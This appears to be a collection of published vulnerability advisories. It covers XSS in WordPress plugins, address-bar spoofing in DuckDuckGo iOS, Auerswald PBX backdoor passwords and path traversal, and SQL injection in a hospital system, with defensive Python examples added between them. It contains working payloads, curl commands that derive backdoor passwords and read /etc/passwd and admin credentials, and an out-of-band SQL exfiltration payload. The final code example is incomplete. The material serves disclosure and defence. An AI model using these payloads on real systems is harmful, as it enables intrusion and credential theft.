<pre><code># Exploit Title: WordPress Plugin IP2Location Country Blocker 2.26.7 - Stored Cross Site Scripting (XSS) (Authenticated)<br /># Date: 02-02-2022<br /># Exploit Author: Ahmet Serkan Ari<br /># Software Link: https://wordpress.org/plugins/ip2location-country-blocker/<br /># Version: 2.26.7<br /># Tested on: Linux<br /># CVE: N/A<br /># Thanks: Ceylan Bozogullarindan<br /><br /><br /># Description:<br />IP2Location Country Blocker is a plugin that enables users to block unwanted traffic from accessing the WordPress frontend (blog pages) or backend (admin area) by country or proxy server. It helps to reduce spam and unwanted sign-ups by preventing unwanted visitors from browsing a particular page or the entire website.<br />An authenticated user is able to inject arbitrary JavaScript or HTML code into the "Frontend Settings" interface available on the settings page of the plugin (Country Blocker), due to incorrect sanitization of user-supplied data, and thereby achieve a Stored Cross-Site Scripting attack against the administrators or other authenticated users. The plugin versions prior to 2.26.7 are affected by this vulnerability.<br /><br /><br />The details of the discovery are given below.<br /><br /># Steps To Reproduce:<br />1. Install and activate the IP2Location Country Blocker plugin.<br />2. Visit the "Frontend Settings" interface available on the settings page of the plugin, which is named "Country Blocker".<br />3. Check the "Enable Frontend Blocking" option.<br />4. Choose the "URL" option for the "Display page when visitor is blocked" setting.<br />5. Type the payload given below into the "URL" input in the "Other Settings" area.<br /><br />http://country-blocker-testing.com/test#"'><script>alert(document.domain)</script><br /><br />6. Click the "Save Changes" button.<br />7. The XSS is triggered on every visit to the settings page by an authenticated user.<br /></code></pre>
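Why this setting needs output encoding and not only URL validation, as an added example that is not the plugin's code: the advisory's payload is a syntactically valid http URL, so a scheme check accepts it, and only escaping at render time keeps it inside the attribute (function names are hypothetical).

```python
"""Added example (not code from the IP2Location Country Blocker plugin):
a redirect-URL setting must be HTML-escaped when rendered, because input-side
URL validation alone cannot reject the advisory's payload."""
import html
from urllib.parse import urlsplit

# Payload quoted in the advisory above.
ADVISORY_PAYLOAD = (
    'http://country-blocker-testing.com/test#"\'><script>alert(document.domain)</script>'
)

ALLOWED_SCHEMES = {"http", "https"}


def validate_redirect_url(value: str) -> bool:
    """Input-side check: only absolute http(s) URLs with a host are accepted.

    This alone does NOT stop the advisory's payload: it is a well-formed http URL
    whose fragment carries the markup, so the check returns True for it."""
    parts = urlsplit(value.strip())
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)


def render_url_input_unsafe(value: str) -> str:
    """The vulnerable pattern: the stored setting is echoed straight into the
    settings page, so the quote in the fragment closes the attribute and the
    rest of the value becomes live markup."""
    return '<input type="text" name="url" value="' + value + '">'


def render_url_input(value: str) -> str:
    """Hardened pattern: escape the value (quotes included) before placing it in
    an attribute; the browser then sees text, not tags."""
    return '<input type="text" name="url" value="' + html.escape(value, quote=True) + '">'


def contains_script_tag(markup: str) -> bool:
    """True if the rendered HTML contains a raw (unescaped) script tag."""
    return "<script>" in markup.lower()
```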
<pre><code>#Vulnerability: Address Bar Spoofing Vulnerability<br />Product: DuckDuckGo<br />Discovered by: Rafay Baloch and Muhammad Samak<br />#Version: 7.64.4<br />#Impact: Moderate<br />#Company: Cyber Citadel<br />#Website: https://www.cybercitadel.com<br /><br /><br />*Description*<br /><br />DuckDuckGo browser for iOS was prone to an "Address Bar Spoofing"<br />vulnerability due to mishandling of JavaScript's window.open function<br />which is used to open a secondary browser window. This could be exploited<br />by tricking the users into supplying sensitive information such as<br />username/passwords etc due to the fact that the address bar would display a<br />legitimate URL, however it would be hosted on the attacker's page.<br /><br /><br /><br />*Proof of Concept (POC)*<br /><br />Following is the POC that could be used to reproduce the issue:<br /><br /><script><br />function spoof(){<br />  location="https://www.google.com/csi?random="+Math.random();<br />  document.body.innerHTML='<h1>This is not Google!</h1>';<br />}<br /></script><br /><input type="button" value="Run"<br />onclick="setInterval('spoof()', 20);"/><br /><br /><br /><br />*Impact*<br /><br />The issue could be abused to carry out more effective phishing attacks<br />against its users.<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross Site Scripting (XSS)<br /># Date: 2022-02-04<br /># Author: Milad karimi<br /># Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/<br /># Version: 1.2<br /># Tested on: Windows 11<br /># CVE: N/A<br /><br />1. Description:<br />This plugin creates a cf7-international-sms-integration from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.<br /><br />2. Proof of Concept:<br />http://localhost/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page=<script>alert("test")</script><br /><br />//By [Ex3ptionaL]<br /></code></pre>
<pre><code>Advisory: Auerswald COMpact Multiple Backdoors<br /><br /><br />RedTeam Pentesting discovered several backdoors in the firmware for the<br />Auerswald COMpact 5500R PBX. These backdoors allow attackers who are<br />able to access the web-based management application full administrative<br />access to the device.<br /><br /><br />Details<br />=======<br /><br />Product: COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP, COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")<br />Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX)), <= 4.0S (COMpact 3000 ISDN, COMpact 3000 analog, COMpact 3000 VoIP)<br />Fixed Versions: 8.2B, 4.0T<br />Vulnerability Type: Backdoor<br />Security Risk: high<br />Vendor URL: https://www.auerswald.de/en/product/compact-5500r<br />Vendor Status: fixed version released<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-007<br />Advisory Status: published<br />CVE: CVE-2021-40859<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40859<br /><br /><br />Introduction<br />============<br /><br />"Fully modular VoIP appliance for more efficient communication processes<br />With the COMpact 5500R, you are originally equipped for everyday<br />business - now and in the future.<br /><br />The fully modular architecture with 80 IP channels and all the functions<br />of a large ITC server allows up to 112 subscribers and thus scales with<br />your company.<br /><br />Continuous maintenance and expansion of the system software makes this<br />versatile IP server a future-proof investment in any business<br />communication."<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />Two backdoor passwords were found in the firmware of the COMpact 5500R<br />PBX. 
One backdoor password is for the secret user "Schandelah", the<br />other can be used for the highest-privileged user "Admin". No way was<br />discovered to disable these backdoors.<br /><br /><br />Proof of Concept<br />================<br /><br />The firmware for the COMpact 5500R can be downloaded from the vendor's<br />homepage[1]. The following details refer to firmware version 7.8A, but<br />the latest firmware at the time of writing (8.0B) is affected as well.<br /><br />Inspecting the downloaded file reveals that it is compressed and can be<br />extracted with the program "gunzip":<br /><br />------------------------------------------------------------------------<br />$ file 7_8A_002_COMpact5500.rom<br />7_8A_002_COMpact5500.rom: gzip compressed data, last modified: Wed Sep 23<br />15:04:43 2020, from Unix, original size 196976698<br /><br />$ mv 7_8A_002_COMpact5500.rom 7_8A_002_COMpact5500.gz<br /><br />$ gunzip 7_8A_002_COMpact5500.gz<br />------------------------------------------------------------------------<br /><br />Analysing the resulting file again shows that it is an image file in the<br />format required by the bootloader "Das U-Boot"[2], a popular bootloader<br />for embedded devices:<br /><br />------------------------------------------------------------------------<br />$ file 7_8A_002_COMpact5500.rom<br /><br />7_8A_002_COMpact5500.rom: u-boot legacy uImage, CP5500 125850, Linux/ARM,<br />Multi-File Image (Not compressed), 196976634 bytes, Wed Sep 23 15:04:38<br />2020, Load Address: 0x00000000, Entry Point: 0x00000000, Header CRC: 0<br />xCECA93E8, Data CRC: 0x99E65DF1<br />------------------------------------------------------------------------<br /><br />The program "dumpimage" (included with u-boot) can be used to list the<br />partitions in the image file:<br /><br />------------------------------------------------------------------------<br />$ dumpimage -l 7_8A_002_COMpact5500.rom<br />Image Name:<br />CP5500 125850<br />Created:<br 
/>Wed Sep 23 17:04:38 2020<br />Image Type:<br />ARM Linux Multi-File Image (uncompressed)<br />Data Size:<br />196976634 Bytes = 192359.99 KiB = 187.85 MiB<br />Load Address: 00000000<br />Entry Point: 00000000<br />Contents:<br />Image 0: 512 Bytes = 0.50 KiB = 0.00 MiB<br />Image 1: 196976110 Bytes = 192359.48 KiB = 187.85 MiB<br />------------------------------------------------------------------------<br /><br />The larger partition then was extracted into the file "rootfs" as<br />follows:<br /><br />------------------------------------------------------------------------<br />$ dumpimage -i 7_8A_002_COMpact5500.rom -p 1 rootfs<br />------------------------------------------------------------------------<br /><br />Contained in the file is an ext2-compatible file system, which was<br />mounted at "/mnt" and inspected:<br /><br />------------------------------------------------------------------------<br />$ file rootfs<br /><br />rootfs: Linux rev 1.0 ext2 filesystem data, UUID=c3604712-a2ca-412f-81ca-<br />f302d7f20ef1, volume name "7.8A_002_125850."<br /><br />$ sudo mount -o loop,ro rootfs /mnt<br /><br />$ cat /mnt/etc/passwd<br />root::0:0:root:/root:/bin/sh<br />netstorage::1:1::/data/ftpd:/bin/false<br />web::2:2::/opt/auerswald/lighttpd:/bin/false<br />------------------------------------------------------------------------<br /><br />The PBX runs the web server lighttpd[3], the configuration files can be<br />found in the folder "/opt/auerswald/lighttpd". The web server forwards<br />most requests via FastCGI to the program "/opt/auerswald/web/webserver".<br />This program can then be analysed, for example using the reverse<br />engineering program Ghidra[4].<br /><br />The manual for the PBX reveals that in order to manage the device, users<br />need to log in with the username "sub-admin". 
When this string is<br />searched within the program in Ghidra, the function which checks<br />passwords on login can be identified.<br /><br />It can easily be seen that besides the username "sub-admin" the function<br />also checks for the hard-coded username "Schandelah", which is the<br />village of Auerswald's headquarters. Further analysis revealed that the<br />corresponding password for this username is derived by concatenating the<br />PBX's serial number, the string "r2d2" and the current date, hashing it<br />with the MD5 hash algorithm and taking the first seven lower-case hex<br />chars of the result.<br /><br />All data needed to derive the password can be accessed without<br />authentication by requesting the path "/about_state", which is also used<br />on the page to which the PBX redirects users who abort the password prompt<br />(shortened and formatted to increase readability):<br /><br />------------------------------------------------------------------------<br />$ curl --include https://192.168.1.2/about_state<br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{<br /> "pbx": "COMpact 5500R",<br /> "pbxType": 35,<br /> "pbxId": 0,<br /> "version": "Version 7.8A - Build 002 ",<br /> "serial": "1234123412",<br /> "date": "30.08.2021",<br /> [...]<br />}<br />------------------------------------------------------------------------<br /><br />The password can be derived as follows:<br /><br />------------------------------------------------------------------------<br />$ echo -n 1234123412r2d230.08.2021 | md5sum | egrep -o '^.{7}'<br />1432d89<br />------------------------------------------------------------------------<br /><br />This password can then be used for authentication:<br /><br />------------------------------------------------------------------------<br />$ curl --include --user 'Schandelah:1432d89' --anyauth \<br /> https://192.168.1.2/tree<br /><br />HTTP/1.1 302 Found<br />Location: 
/statics/html/page_servicetools.html<br />Set-Cookie: AUERSessionID1234123412=AXCTMGGCCUAGBSE; HttpOnly; Path=/<br />[...]<br />------------------------------------------------------------------------<br /><br />Next, the endpoint "/logstatus_state" can be queried using the returned<br />session ID to check the access level:<br /><br />------------------------------------------------------------------------<br />% curl --cookie 'AUERSessionID1234123412=AXCTMGGCCUAGBSE' --include \<br /> https://192.168.1.2/logstatus_state<br /><br />HTTP/1.1 200 OK<br />X-XSS-Protection: 1<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"logstatus":"Haendler"}<br />------------------------------------------------------------------------<br /><br />The returned access level is "Haendler" (reseller). After login, the web<br />server redirects to a special service page at the path<br />"/statics/html/page_servicetools.html". Among other things, it allows to<br />download a backup of all data on the device, configure audio recording<br />and reset the password, PIN and token for the user "Admin". Accessing<br />regular administrative functions is not possible directly with this user<br />account.<br /><br />When inspecting the password checking function, a second backdoor can be<br />found. When the username "Admin" is specified, the given password is<br />tested against the configured password as well as a password derived in<br />a similar way from the PBX's serial number, the string "r2d2", the<br />current date and the configured language. 
The MD5 hash is taken and the<br />specified password is tested against the first seven characters of the<br />lower case hexadecimal hash.<br /><br />The backdoor password for the "Admin" user can be calculated as follows:<br /><br />------------------------------------------------------------------------<br />$ echo -n 1234123412r2d230.08.2021DE | md5sum | egrep -o '^.{7}'<br />92fcdd9<br />------------------------------------------------------------------------<br /><br />The server returns a session ID for that password and the username<br />"Admin":<br /><br />------------------------------------------------------------------------<br />$ curl --user 'Admin:92fcdd9' --anyauth --include \<br /> https://192.168.1.2/tree<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Set-Cookie: AUERSessionID1234123412=MLJHCDLPMXPNKWY; HttpOnly; Path=/<br />[...]<br /><br />[{"login":3,"userId":0,"userName":"",[...]}]<br />------------------------------------------------------------------------<br /><br />Checking the access level of the session reveals the status<br />"Administrator":<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=MLJHCDLPMXPNKWY' --include \<br /> https://192.168.1.2/logstatus_state<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"logstatus":"Administrator"}<br />------------------------------------------------------------------------<br /><br /><br />Workaround<br />==========<br /><br />Disable or restrict access to the web-based management interface if<br />possible.<br /><br /><br />Fix<br />===<br /><br />Upgrade to a firmware version which corrects this vulnerability.<br /><br /><br />Security Risk<br />=============<br /><br />By inspecting the firmware for the COMpact 5500R PBX, attackers can<br />easily discover two backdoor passwords. 
One password is for the secret<br />user account with the username "Schandelah", the other works as an<br />alternative password for the user "Admin". Using the backdoor, attackers<br />are granted access to the PBX with the highest privileges, enabling them<br />to completely compromise the device. The passwords are derived from the<br />serial number, the current date and the configured language.<br /><br />The backdoor passwords are not documented. They secretly coexist with a<br />documented password recovery function supported by the vendor. No way<br />was found to disable the backdoor access.<br /><br />All information needed to derive the passwords can be requested over the<br />network without authentication, so attackers only require network access<br />to the web-based management interface.<br /><br />Due to the ease of exploitation and severe consequences, the backdoor<br />passwords are rated as a high risk.<br /><br /><br />Timeline<br />========<br /><br />2021-08-26 Vulnerability identified<br />2021-09-01 Customer approved disclosure to vendor<br />2021-09-10 Vendor notified<br />2021-09-10 CVE ID requested<br />2021-09-10 CVE ID assigned<br />2021-10-05 Vendor provides access to device with fixed firmware<br />2021-10-11 Vendor provides fixed firmware<br />2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected<br />2021-12-06 Advisory published<br /><br /><br />References<br />==========<br /><br />[1] https://www.auerswald.de/de/support/download/firmware-compact-5500<br />[2] https://www.denx.de/wiki/U-Boot<br />[3] https://www.lighttpd.net<br />[4] https://ghidra-sre.org<br /><br /><br />RedTeam Pentesting GmbH<br />=======================<br /><br />RedTeam Pentesting offers individual penetration tests performed by a<br />team of specialised IT-security experts. 
Hereby, security weaknesses in<br />company networks or products are uncovered and can be fixed immediately.<br /><br />As there are only few experts in this field, RedTeam Pentesting wants to<br />share its knowledge and enhance the public knowledge with research in<br />security-related areas. The results are made available as public<br />security advisories.<br /><br />More information about RedTeam Pentesting can be found at:<br />https://www.redteam-pentesting.de/<br /><br /><br />Working at RedTeam Pentesting<br />=============================<br /><br />RedTeam Pentesting is looking for penetration testers to join our team<br />in Aachen, Germany. If you are interested please visit:<br />https://www.redteam-pentesting.de/jobs/<br /><br /><br />-- <br />RedTeam Pentesting GmbH Tel.: +49 241 510081-0<br />Dennewartstr. 25-27 Fax : +49 241 510081-99<br />52068 Aachen https://www.redteam-pentesting.de<br />Germany Registergericht: Aachen HRB 14004<br />Geschäftsführer: Patrick Hof, Jens Liebchen<br /></code></pre>
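The derivation described in the advisory above, carried through from the fields the unauthenticated /about_state endpoint returns, as an added example that is not the advisory's or the vendor's code (the JSON is constructed from the advisory's sample values; the function names are hypothetical). What it makes concrete is the basis for the "high" rating: none of the inputs to the "secret" is secret.

```python
"""Added example, not part of the RedTeam Pentesting advisory: reproduces the
backdoor password derivation the advisory describes, from the public
/about_state fields, to show that the scheme has no secret input at all."""
import hashlib
import json
import re

# Constructed sample, following the shortened /about_state response in the advisory.
ABOUT_STATE_JSON = """{
 "pbx": "COMpact 5500R",
 "version": "Version 7.8A - Build 002 ",
 "serial": "1234123412",
 "date": "30.08.2021"
}"""

SECRET_CONSTANT = "r2d2"  # hard-coded string the advisory found in the firmware


def backdoor_material(serial: str, date: str, language: str = "") -> str:
    """The string the firmware hashes: serial + "r2d2" + date, followed by the
    configured language for the "Admin" variant (empty for "Schandelah")."""
    return f"{serial}{SECRET_CONSTANT}{date}{language}"


def derive_backdoor_password(serial: str, date: str, language: str = "") -> str:
    """First seven lower-case hex characters of the MD5 digest, exactly as the
    advisory's `echo -n ... | md5sum | egrep -o '^.{7}'` one-liner computes."""
    digest = hashlib.md5(backdoor_material(serial, date, language).encode()).hexdigest()
    return digest[:7]


def backdoor_passwords_from_about_state(about_state: str, language: str = "DE") -> dict:
    """Parse the unauthenticated JSON and return both backdoor passwords.

    Everything needed (serial and device date) is in the response; the language
    is a device setting, assumed here to be "DE" as in the advisory's example."""
    data = json.loads(about_state)
    serial, date = data["serial"], data["date"]
    if not re.fullmatch(r"\d{2}\.\d{2}\.\d{4}", date):
        raise ValueError("unexpected date format: " + date)
    return {
        "Schandelah": derive_backdoor_password(serial, date),
        "Admin": derive_backdoor_password(serial, date, language),
    }
```

Because the device date advances daily, a fixed blocklist of the derived values is not a usable mitigation; the advisory's workaround (restricting network access to the management interface) and the firmware upgrade are.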
<pre><code>## Title: Hospital Management System v4.0 Multiple SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.06.2022<br />## Vendor: https://github.com/kishan0725<br />## Software: https://github.com/kishan0725/Hospital-Management-System<br />## CVE-2022-24263<br /><br /><br />## Description:<br />The Hospital Management System v4.0 is suffering from multiple<br />SQL injections via three parameters in the function.php, contact.php and<br />func3.php files.<br />Using this vulnerability, an attacker can retrieve all information from<br />the system, including sensitive information about the customers of this<br />system.<br />WARNING: Whether this is exposed on an external domain, a subdomain or<br />an internal network, it is extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: txtName (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: txtName=821761' AND (SELECT 9346 FROM<br />(SELECT(SLEEP(3)))HJGv) AND<br />'xkCZ'='xkCZ&txtEmail=xstxPhYW@https://github.com/kishan0725/Hospital-Management-System&txtPhone=813-439-23'+(select<br />load_file('\\\\k0lnu24kl14z5bxcoo5tj7z4bvho5fz3q6ey1qpf.https://github.com/kishan0725/Hospital-Management-System\\hgq'))+'&btnSubmit=Send<br />Message&txtMsg=441931<br />---<br /><br />-------------------------------------------<br /><br />---<br />Parameter: #1* ((custom) POST)<br /> Type: error-based<br /> Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)<br /> Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2936)<br />OR 1 GROUP BY CONCAT(0x7162706271,(SELECT (CASE WHEN (5080=5080) THEN<br />1 ELSE 0 END)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING<br />MIN(0)#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (random number) - 1 column<br /> 
Payload: email=riiVAqjG@https://github.com/kishan0725/Hospital-Management-System'+(select-2730)<br />UNION ALL SELECT<br />8185,8185,CONCAT(0x7162706271,0x5777534a4b68716f6d4270614362544c4954786a4f774b6852586b47694945644a70757262644c52,0x716b767a71),8185,8185,8185,8185,8185#from(select(sleep(20)))a)+'&password2=d3U!l9k!E4&patsub=Login<br />---<br /><br />-------------------------------------------<br /><br />---<br />Parameter: #1* ((custom) POST)<br /> Type: error-based<br /> Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)<br /> Payload: username3=CHnDaCTc'+(select-2423) OR 1 GROUP BY<br />CONCAT(0x71626a6271,(SELECT (CASE WHEN (5907=5907) THEN 1 ELSE 0<br />END)),0x716b766b71,FLOOR(RAND(0)*2)) HAVING<br />MIN(0)#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (random number) - 1 column<br /> Payload: username3=CHnDaCTc'+(select-3282) UNION ALL SELECT<br />CONCAT(0x71626a6271,0x446c68526a796c4475676e54774d6b617a6977736855756f63796f43686d706c637877534a557076,0x716b766b71),4829,4829,4829,4829#from(select(sleep(20)))a)+'&password3=a5B!n6f!U1&docsub1=Login<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-24263)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/m4hnm1)<br /><br /></code></pre>
<pre><code>Advisory: Auerswald COMpact Arbitrary File Disclosure<br /><br /><br />RedTeam Pentesting discovered a vulnerability in the web-based<br />management interface of the Auerswald COMpact 5500R PBX which allows<br />users with the "sub-admin" privilege to access any files on the PBX's<br />file system.<br /><br /><br />Details<br />=======<br /><br />Product: COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX), COMpact 5010 VoIP, COMpact 5020 VoIP, COMmander Business(19"), COMmander Basic.2(19")<br />Affected Versions: <= 8.0B (COMpact 4000, COMpact 5000(R), COMpact 5200(R), COMpact 5500R, COMmander 6000(R)(RX))<br />Fixed Versions: 8.2B<br />Vulnerability Type: Arbitrary File Disclosure<br />Security Risk: medium<br />Vendor URL: https://www.auerswald.de/en/product/compact-5500r<br />Vendor Status: fixed version released<br />Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-006<br />Advisory Status: published<br />CVE: CVE-2021-40858<br />CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40858<br /><br /><br />Introduction<br />============<br /><br />"Fully modular VoIP appliance for more efficient communication processes<br />With the COMpact 5500R, you are originally equipped for everyday<br />business - now and in the future.<br /><br />The fully modular architecture with 80 IP channels and all the functions<br />of a large ITC server allows up to 112 subscribers and thus scales with<br />your company.<br /><br />Continuous maintenance and expansion of the system software makes this<br />versatile IP server a future-proof investment in any business<br />communication."<br /><br />(from the vendor's homepage)<br /><br /><br />More Details<br />============<br /><br />RedTeam Pentesting discovered that attackers with administrative access<br />to the PBX's web-based management interface (as a so-called "sub-admin")<br />can download arbitrary files from the PBX's file system. 
This includes<br />the usually not accessible configuration database which contains the<br />password for the highly privileged "Admin" user in clear text.<br /><br /><br />Proof of Concept<br />================<br /><br />The command-line HTTP client curl[1] can be used to log into the<br />management interface of the PBX with the username "sub-admin" and the<br />password "verysecretpassword" as follows:<br /><br />------------------------------------------------------------------------<br />$ curl --anyauth --user sub-admin:verysecretpassword --include \<br /> https://192.168.1.2/tree<br /><br />[...]<br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />Set-Cookie: AUERSessionID1234123412=ERQMMDGECSGWTII; HttpOnly; Path=/<br />[...]<br /><br />[{"login":2,"userId":2222,[...]}]<br />------------------------------------------------------------------------<br /><br />The server returns a session ID in a cookie which is then used to check<br />the access level:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \<br /> https://192.168.1.2/logstatus_state<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"logstatus":"Sub-Administrator"}<br />------------------------------------------------------------------------<br /><br />In the PBX's user management, the access level "Sub-Administrator" is<br />used for user accounts who should be able to configure the PBX. 
There<br />are also other, higher-level access privileges.<br /><br />Users with the "sub-admin" privilege can configure music on hold (MOH,<br />"Wartemusik"), and for example listen to the currently configured music.<br />In order to do this, the browser requests the music files from the PBX.<br /><br />The file "alarm1.wav" can be accessed with curl as follows:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \<br />'https://192.168.1.2/wartemusik_verwaltung_play?fileName=alarm1.wav'\<br />'&pageindex=1'<br /><br />HTTP/1.1 200 OK<br />Content-Type: audio/x-wav; charset=<br />Content-Length: 132192<br />Content-disposition: attachment; filename="alarm1.wav"<br />[...]<br />------------------------------------------------------------------------<br /><br />It was found that the PBX allows directory traversal with the string<br />"../", so the file "/etc/passwd" can be accessed as follows:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \<br />'https://192.168.1.2/wartemusik_verwaltung_play?'\<br />'fileName=../../etc/passwd&pageindex='<br /><br />HTTP/1.1 200 OK<br />[...]<br />Content-Length: 113<br />Content-disposition: attachment; filename="../../etc/passwd"<br />[...]<br /><br />root::0:0:root:/root:/bin/sh<br />netstorage::1:1::/data/ftpd:/bin/false<br />web::2:2::/opt/auerswald/lighttpd:/bin/false<br />------------------------------------------------------------------------<br /><br />The same issue is present in the function for managing logos. 
A regular<br />request for the file "logo1.jpg" is shown below:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \<br />'https://192.168.1.2/logo_verwaltung_preview?fileName=logo1.jpg&424'<br /><br />HTTP/1.1 200 OK<br />X-XSS-Protection: 1<br />Content-Type: image/jpg; charset=UTF-8<br />Content-Length: 13986<br />Content-disposition: attachment; filename="logo1.jpg"<br />[...]<br />------------------------------------------------------------------------<br /><br />In a similar fashion as before, the file "/etc/passwd" can be accessed:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' --include \<br />'https://192.168.1.2/logo_verwaltung_preview?fileName=../../etc/passwd'<br /><br />HTTP/1.1 200 OK<br />[...]<br /><br />root::0:0:root:/root:/bin/sh<br />netstorage::1:1::/data/ftpd:/bin/false<br />web::2:2::/opt/auerswald/lighttpd:/bin/false<br />------------------------------------------------------------------------<br /><br />For attackers, an interesting file is the SQLite[2] database file<br />"/data/db/pbx4.db". 
It can be downloaded as follows:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=ERQMMDGECSGWTII' 'https://'\<br />'192.168.1.2/logo_verwaltung_preview?fileName=../../data/db/pbx4.db' \<br /> > pbx4.db<br /><br /> % Total % Received % Xferd Average Speed Time Time Time Current<br /> Dload Upload Total Spent Left Speed<br />100 5120 100 5120 0 0 16253 0 --:--:-- --:--:-- --:--:-- 16305<br />------------------------------------------------------------------------<br /><br />This file contains the password for the highly privileged "Admin" user<br />account:<br /><br />------------------------------------------------------------------------<br />$ sqlite3 pbx4.db<br />SQLite version 3.27.2 2019-02-25 16:06:06<br />Enter ".help" for usage hints.<br /><br />sqlite> .tables<br />DbFileVersion PbxMisc<br /><br />sqlite> select * from PbxMisc;<br />[...]<br />AdminPasswdHash|<br />AdminLogin|Admin<br />AdminPin|43214321<br />AdminPasswd|S3kr1t!<br />------------------------------------------------------------------------<br /><br />The username and password can then be used to log into the web<br />application:<br /><br />------------------------------------------------------------------------<br />$ curl --user 'Admin:S3kr1t!' 
--anyauth --include \<br /> https://192.168.1.2/tree<br /><br />HTTP/1.1 200 OK<br />Set-Cookie: AUERSessionID1234123412=AJXGKBFTCIHSHAC; HttpOnly; Path=/<br />[...]<br /><br />[{"login":3,"userId":0,"userName":"",[...]}]<br />------------------------------------------------------------------------<br /><br />Checking the access level reveals the new privilege:<br /><br />------------------------------------------------------------------------<br />$ curl --cookie 'AUERSessionID1234123412=AJXGKBFTCIHSHAC' --include \<br /> https://192.168.1.2/logstatus_state<br /><br />HTTP/1.1 200 OK<br />Content-Type: application/json; charset=utf-8;<br />[...]<br /><br />{"logstatus":"Administrator"}<br />------------------------------------------------------------------------<br /><br />The user "Admin", in contrast to regular administrative users<br />("sub-admin"), can access more functions and for example apply firmware<br />updates.<br /><br />Workaround<br />==========<br /><br />Disable or restrict access to the web-based management if possible.<br /><br /><br />Fix<br />===<br /><br />Upgrade to a firmware version which corrects this vulnerability.<br /><br /><br />Security Risk<br />=============<br /><br />Attackers who already have acquired administrative access as a so-called<br />"sub-admin" can download a database file and access the password for the<br />highly privileged "Admin" account. This account can use more functions and<br />is allowed to apply firmware updates.<br /><br />On the one hand, exploiting this vulnerability already requires<br />administrative access. On the other hand, attackers can reach<br />high-privileged access to the PBX and use functions not available to<br />"sub-admin" users, like firmware updates. 
All in all, this vulnerability<br />is therefore rated to have a medium risk potential.<br /><br /><br />Timeline<br />========<br /><br />2021-08-26 Vulnerability identified<br />2021-09-01 Customer approved disclosure to vendor<br />2021-09-10 Vendor notified<br />2021-09-10 CVE ID requested<br />2021-09-10 CVE ID assigned<br />2021-10-05 Vendor provides access to device with fixed firmware<br />2021-10-11 Vendor provides fixed firmware<br />2021-10-15 RedTeam Pentesting examines device, vulnerability seems to be corrected<br />2021-12-06 Advisory published<br /><br /><br />References<br />==========<br /><br />[1] https://curl.se<br />[2] https://www.sqlite.org<br /></code></pre>
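How the fileName parameter of the music-on-hold and logo handlers described above should be resolved so that "../" cannot leave the media directory, as an added example that is not the Auerswald firmware's code (the base directory, allowed suffixes and function name are assumptions; the request values are the ones the advisory shows).

```python
"""Added example, not code from the Auerswald firmware: containment check for a
user-supplied file name before serving it from a fixed media directory."""
import posixpath

MOH_BASE_DIR = "/opt/auerswald/moh"     # hypothetical storage location for MOH/logo files
ALLOWED_SUFFIXES = (".wav", ".jpg")     # the media types the two handlers serve


def resolve_media_path(file_name: str, base_dir: str = MOH_BASE_DIR):
    """Return the absolute path to serve, or None if the request must be refused.

    The check normalises the joined path and then verifies it still lies below
    base_dir. A substring test for "../" is not sufficient (a name such as
    "alarm1.wav/../../../etc/passwd" also escapes), and an absolute file_name
    must be refused explicitly because posixpath.join() would discard base_dir.
    """
    if not file_name or "\x00" in file_name:
        return None
    if file_name.startswith("/"):
        return None
    candidate = posixpath.normpath(posixpath.join(base_dir, file_name))
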